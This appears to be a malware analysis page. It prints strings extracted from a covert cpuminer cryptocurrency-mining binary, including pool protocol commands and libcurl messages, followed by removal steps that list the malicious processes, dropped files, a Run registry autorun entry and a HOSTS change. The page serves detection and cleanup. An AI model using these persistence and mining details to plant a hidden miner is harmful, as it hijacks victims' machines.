{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}{"method": "getwork", "params": [ "%s" ], "id":1}Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}#"! '&%$ *)(/.-,32107654;:98?>=<2
tXXFr.rh.44Aw-wl-66
r.rh.44Fw-wl-66A
.rh.44Fr-wl-66Aw
O9K\9..eKW
trh.44Fr.wl-66Aw-
K\9..eK9
h.44Fr.rl-66Aw-w
O\9..eK9K=W
.44Fr.rh-66Aw-wl
9..eK9K\W
t44Fr.rh.66Aw-wl-
..eK9K\9
tX4Fr.rh.46Aw-wl-6
.eK9K\9.
7.35.0
smtp
tftp
getpeername() failed with errno %d: %s
getsockname() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Immediate connect fail for %s: %s
Couldn't bind to '%s'
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
[%s %s %s]
Send failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
%s:%d
Hostname was %sfound in DNS cache
timeout on name lookup is not supported
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
IDN support not present, can't parse Unicode domains
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
[^:]:%[^
:]://%[^
malformed
SMTP.
Rebuilt URL to: %s
Protocol %s not supported or disabled in libcurl
%s://%s
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Found bundle for host %s: %p
Server doesn't support pipelining
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with host %s
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Connection #%ld to host %s left intact
Curl_poll(%d ds, %d ms)
Internal error clearing splay node = %d
Internal error removing splay node = %d
Pipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %I64d
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
%d.%d.%d.%d
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Please call curl_multi_perform() soon
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: unknown PASS reply
FTP: Accepting server connect has timed out
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Problem with the SSL CA cert (path? access rights?)
Error in the SSH layer
Issuer check against peer certificate failed
FTP: The server did not accept the PRET command.
Unable to parse FTP file list
0123456789
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
Curl_ipv4_resolve_r failed for %s
%sAuthorization: Basic %s
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
Chunky upload is not supported by HTTP 1.0
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
USER %s
PBSZ %d
Failure sending QUIT command: %s
ftp server doesn't support SIZE
RETR %s
Connect data stream passively
APPE %s
STOR %s
SIZE %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
socket failure: %s
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
%s %s
Failure sending PORT command: %s
Uploading to a URL without a file name!
FTPS not supported!
PASS %s
ACCT %s
Access denied: d
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skips %d.%d.%d.%d for data connection, uses %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Connecting to %s (%s) port %d
TYPE %c
MDTM %s
CWD %s
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
FTP response timeout
FTP response aborted due to select/poll error: %d
Preparing for accepting server on data port
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
AUTH %s
ACCT rejected by server: d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
dddddd
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
PRET command not accepted: d
Failed to do PORT
RETR response: d
Failed FTP upload:
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
ftp_perform ends with SECONDARY: %d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
PORT
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
WS2_32.DLL
CLIENT libcurl 7.35.0
MATCH %s %s %s
DEFINE %s %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
LDAP local: trying to establish %s connection
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
set timeouts for state %d; Total %ld, retry %d maxtry %d
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
bind() failed; %s
%s%c%s%c
tftp_send_first: internal error
TFTP finished
TFTP response timeout
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
TFTP
%cd
LIST "%s" *
FETCH %s BODY[%s]
LOGIN
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
IMAPS not supported!
Access denied: %d
APPEND %s (\Seen) {%I64d}SELECT %s
LOGINDISABLED
STARTTLS not supported.
STARTTLS denied. %c
Access denied. %c
Authentication failed: %d
AUTH %s %s
POP3S not supported!
APOP %s %s
STLS not supported.
RCPT TO:%s
RCPT TO:<%s>
SMTPS not supported!
Got unexpected smtp-server response: %d
EHLO %s
HELO %s
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
SMTP
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%%X
xxxx
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
login
password
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Simulate a HTTP 304 response!
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is not blacklisted
Server %s is blacklisted
d:d:d
d:d
%c%c==
%c%c%c=
------------------------xx
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
.jpeg
.html
0123456789-
%s xxxxxxxxxxxxxxxx
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
user=%s
auth=Bearer %s
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
Assertion failed: (%s), file %s, line %d
M%p %d %s
M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
once %p is %d
T%p %d %s
T%p %d V=%0X H=%p %s
C%p %d %s
C%p %d V=%0X B=%d b=%p w=%ld %s
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
unknown option -- %s
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %c
jZGCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
PeekNamedPipe
_acmdln
_amsg_exit
ldap_msgfree
ADVAPI32.dll
KERNEL32.dll
msvcrt.dll
USER32.dll
wldap32.dll
WS2_32.dll
"@"@"@"@
File: %ws, Line %u
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ihjbkwa.exe:4288
ihjbkwa.exe:3024
etxfew6ip3cqi.exe:5992
etxfew6hh66qizwomjjb.exe:3416
etxfew6i9qdqi.exe:4436
etxfew6i9qdqi.exe:5568
uucarfjeig.exe:1588
uucarfjeig.exe:4580
etxfew6j1y0qi.exe:2996
%original file name%.exe:556
etxfew6hjveqi.exe:5396 - Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%System%\ansdmhhppztc\tst (10 bytes)
%WinDir%\Temp\etxfew6i9qdqi.exe (35 bytes)
%System%\ansdmhhppztc\ihst (228 bytes)
%System%\ansdmhhppztc\por (1 bytes)
%System%\uucarfjeig.exe (5873 bytes)
%System%\win64drkaesent.exe (67687 bytes)
%WinDir%\Temp\etxfew6hjveqi.exe (35 bytes)
%System%\win64drkclient.exe (68472 bytes)
%System%\drivers\etc\hosts (904 bytes)
%WinDir%\Temp\etxfew6iunfqi.exe (1940 bytes)
%System%\ansdmhhppztc\run (10 bytes)
%WinDir%\Temp\etxfew6ip3cqi.exe (5873 bytes)
%System%\ansdmhhppztc\rng (104 bytes)
%System%\win32drkclient.exe (25340 bytes)
%System%\ansdmhhppztc\cfg (902 bytes)
%WinDir%\Temp\etxfew6j1y0qi.exe (35 bytes)
%System%\ansdmhhppztc\etc (10 bytes)
%System%\ihjbkwa.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etxfew6hh66qizwomjjb.exe (3890 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Profile Peer Logs Encryption" = "%System%\ihjbkwa.exe" - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.